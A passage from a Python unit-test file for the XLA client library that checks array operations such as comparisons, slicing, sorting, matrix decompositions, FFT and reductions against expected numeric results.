_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(c, 0,
xla_client.shape_from_pyval(np.array(0, dtype=in_dtype)))
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
c = self._NewComputation("reducer")
shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
shape = shape.with_major_to_minor_layout_if_absent()
ps = [ops.Parameter(c, i, shape) for i in range(4)]
which = ops.Ge(ps[0], ps[2])
ops.Tuple(
c, [ops.Select(which, ps[0], ps[2]),
ops.Select(which, ps[1], ps[3])])
reducer = c.build()
key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operands=[ops.Constant(c, key_array),
ops.Constant(c, val_array)],
init_values=[
ops.Constant(c, np.int32(0)),
ops.Constant(c, np.int32(0))
],
computation=reducer,
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
